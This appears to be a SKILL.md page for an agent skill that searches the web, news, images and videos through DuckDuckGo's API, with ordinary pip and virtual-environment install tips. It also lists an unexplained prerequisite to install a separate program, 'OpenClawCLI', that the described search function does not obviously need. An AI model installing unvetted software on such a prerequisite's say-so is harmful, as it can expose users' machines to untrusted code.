web-search-hub
Installation
SKILL.md
Web Search Hub
Search the web using DuckDuckGo's API. Supports web pages, news articles, images, and videos with customizable filtering and output formats.
⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS) and run pip install duckduckgo-search
Installation Best Practices:
- If you encounter permission errors, use a virtual environment instead of system-wide installation
- For virtual environment:
python -m venv venv && source venv/bin/activate && pip install duckduckgo-search - Never use
--break-system-packagesas it can damage your system's Python installation